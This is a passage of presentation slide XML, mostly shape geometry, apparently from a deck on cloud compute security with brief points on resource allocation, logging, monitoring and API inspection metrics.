              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Cloud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compute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security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helps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processing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resources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cloud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workloads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(CPU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RAM).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usually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works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virtual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machines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containers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referred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as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dynamic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resource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allocation.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3500">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="635">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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following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critical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security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considerations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identified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within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cloud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compute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security.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82715" y="306451"/>
            <a:ext cx="42894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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compute</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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6276" y="760476"/>
            <a:ext cx="5759196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887092" y="6099428"/>
            <a:ext cx="12446000" cy="1565910"/>
            <a:chOff x="1887092" y="6099428"/>
            <a:chExt cx="12446000" cy="1565910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1896617" y="6108953"/>
              <a:ext cx="4273550" cy="624840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4273550" h="624840">
                  <a:moveTo>
                    <a:pt x="4169155" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="104139" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63597" y="8181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30495" y="30495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8181" y="63597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="104140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="624840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273296" y="624840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273296" y="104140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4265114" y="63597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242800" y="30495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209698" y="8181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4169155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896617" y="6108953"/>
              <a:ext cx="4273550" cy="624840"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4273550" h="624840">
                  <a:moveTo>
                    <a:pt x="104139" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4169155" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4209698" y="8181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4242800" y="30495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4265114" y="63597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273296" y="104140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4273296" y="624840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="624840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="104140"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8181" y="63597"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="30495" y="30495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="63597" y="8181"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="104139" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050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896617" y="6578345"/>
              <a:ext cx="12426950" cy="1077595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12426950" h="1077595">
                  <a:moveTo>
                    <a:pt x="12338176" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88518" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54060" y="6955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25923" y="25923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6955" y="54060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="988948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6955" y="1023407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25923" y="1051544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54060" y="1070512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88518" y="1077467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12338176" y="1077467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12372635" y="1070512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12400772" y="1051544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419740" y="1023407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="988948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419740" y="54060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12400772" y="25923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12372635" y="6955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123381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896617" y="6578345"/>
              <a:ext cx="12426950" cy="1077595"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12426950" h="1077595">
                  <a:moveTo>
                    <a:pt x="0" y="88518"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="6955" y="54060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25923" y="25923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54060" y="6955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88518" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12338176" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12372635" y="6955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12400772" y="25923"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419740" y="54060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="88518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426695" y="988948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12419740" y="1023407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12400772" y="1051544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12372635" y="1070512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12338176" y="1077467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88518" y="1077467"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54060" y="1070512"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25923" y="1051544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6955" y="1023407"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="988948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="88518"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050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092579" y="6145148"/>
            <a:ext cx="8851900" cy="10814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Instance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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Awareness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5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User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should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use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logging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monitoring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mitigate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cloud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sprawl.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887092" y="2583560"/>
            <a:ext cx="12563475" cy="3044190"/>
            <a:chOff x="1887092" y="2583560"/>
            <a:chExt cx="12563475" cy="3044190"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="object 11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1908809" y="2593085"/>
              <a:ext cx="4320540" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="678179">
                  <a:moveTo>
                    <a:pt x="4207510" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="113029" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69008" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33083" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8874" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311665" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287456" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4251531" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4207510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908809" y="2593085"/>
              <a:ext cx="4320540" cy="678180"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4320540" h="678179">
                  <a:moveTo>
                    <a:pt x="113029" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4207510" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4251531" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4287456" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311665" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320540" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="678180"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="113030"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8874" y="69008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="33083" y="33083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="69008" y="8874"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="113029" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19050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896617" y="3062477"/>
              <a:ext cx="12544425" cy="2555875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2555875">
                  <a:moveTo>
                    <a:pt x="12334113" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="209931" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161792" y="5543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117604" y="21336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78625" y="46116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46116" y="78625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21336" y="117604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5543" y="161792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="209931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2345817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5543" y="2393955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21336" y="2438143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46116" y="2477122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78625" y="2509631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117604" y="2534412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161792" y="2550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209931" y="2555748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12334113" y="2555748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12382251" y="2550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426439" y="2534412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12465418" y="2509631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12497927" y="2477122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12522707" y="2438143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538500" y="2393955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="2345817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="209931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538500" y="161792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12522708" y="117604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12497927" y="78625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12465418" y="46116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426439" y="21336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12382251" y="5543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123341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896617" y="3062477"/>
              <a:ext cx="12544425" cy="2555875"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="2555875">
                  <a:moveTo>
                    <a:pt x="0" y="209931"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5543" y="161792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21336" y="117604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46116" y="78625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78625" y="46116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117604" y="21336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161792" y="5543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209931" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12334113" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12382251" y="5543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426439" y="21336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12465418" y="46116"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12497927" y="78625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12522708" y="117604"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538500" y="161792"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="209931"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544043" y="2345817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12538500" y="2393955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12522707" y="2438143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12497927" y="2477122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12465418" y="2509631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12426439" y="2534412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12382251" y="2550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12334113" y="2555748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="209931" y="2555748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="161792" y="2550204"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="117604" y="2534412"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78625" y="2509631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="46116" y="2477122"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21336" y="2438143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5543" y="2393955"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2345817"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="209931"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049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2092579" y="2659837"/>
            <a:ext cx="395351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5">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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Inspection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Integration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42489" y="3567176"/>
            <a:ext cx="9725025" cy="1366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Number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requests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metric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used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count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number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requests.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Latency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measured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specific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service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across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all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services.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Error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rates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measure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percentage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errors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classifies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error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types.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Unauthorized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suspicious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endpoints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manage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connections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API.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59635" y="3073400"/>
            <a:ext cx="3939540" cy="4551680"/>
            <a:chOff x="1659635" y="3073400"/>
            <a:chExt cx="3939540" cy="4551680"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="object 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1659635" y="3752087"/>
              <a:ext cx="3133725" cy="3133725"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3133725" h="3133725">
                  <a:moveTo>
                    <a:pt x="1566671" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1518774" y="718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471234" y="2859"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424072" y="6402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377309" y="11327"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1330964" y="17613"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285060" y="25241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239615" y="34188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194651" y="44436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150187" y="55962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106245" y="68748"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062846" y="82772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020008" y="98014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977754" y="114454"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936102" y="132070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895075" y="150843"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854692" y="170752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814974" y="191776"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775941" y="213896"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737614" y="237090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700014" y="261338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663160" y="286619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627073" y="312914"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591774" y="340201"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557284" y="368460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523622" y="397671"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490809" y="427814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458866" y="458866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427814" y="490809"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397671" y="523622"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368460" y="557284"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340201" y="591774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312914" y="627073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286619" y="663160"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261338" y="700014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237090" y="737614"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213896" y="775941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191776" y="814974"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170752" y="854692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150843" y="895075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132070" y="936102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114454" y="977754"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98014" y="1020008"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82772" y="1062846"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68748" y="1106245"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55962" y="1150187"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44436" y="1194651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34188" y="1239615"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25241" y="1285060"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17613" y="1330964"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11327" y="1377309"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6402" y="1424072"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2859" y="1471234"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1518774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1566672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="718" y="1614569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2859" y="1662109"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6402" y="1709271"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11327" y="1756034"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17613" y="1802379"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25241" y="1848283"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="34188" y="1893728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44436" y="1938692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55962" y="1983156"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="68748" y="2027098"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="82772" y="2070497"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="98014" y="2113335"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="114454" y="2155589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="132070" y="2197241"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="150843" y="2238268"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="170752" y="2278651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="191776" y="2318369"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213896" y="2357402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="237090" y="2395729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="261338" y="2433329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="286619" y="2470183"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="312914" y="2506270"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="340201" y="2541569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="368460" y="2576059"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="397671" y="2609721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="427814" y="2642534"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="458866" y="2674477"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="490809" y="2705529"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523622" y="2735672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="557284" y="2764883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591774" y="2793142"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="627073" y="2820429"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="663160" y="2846724"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="700014" y="2872005"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="737614" y="2896253"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775941" y="2919447"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="814974" y="2941567"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854692" y="2962591"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="895075" y="2982500"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="936102" y="3001273"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="977754" y="3018889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1020008" y="3035329"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1062846" y="3050571"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1106245" y="3064595"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1150187" y="3077381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1194651" y="3088907"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1239615" y="3099155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1285060" y="3108102"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1330964" y="3115730"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1377309" y="3122016"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1424072" y="3126941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1471234" y="3130484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1518774" y="3132625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1566671" y="3133344"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1614569" y="3132625"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1662109" y="3130484"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1709271" y="3126941"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1756034" y="3122016"/>
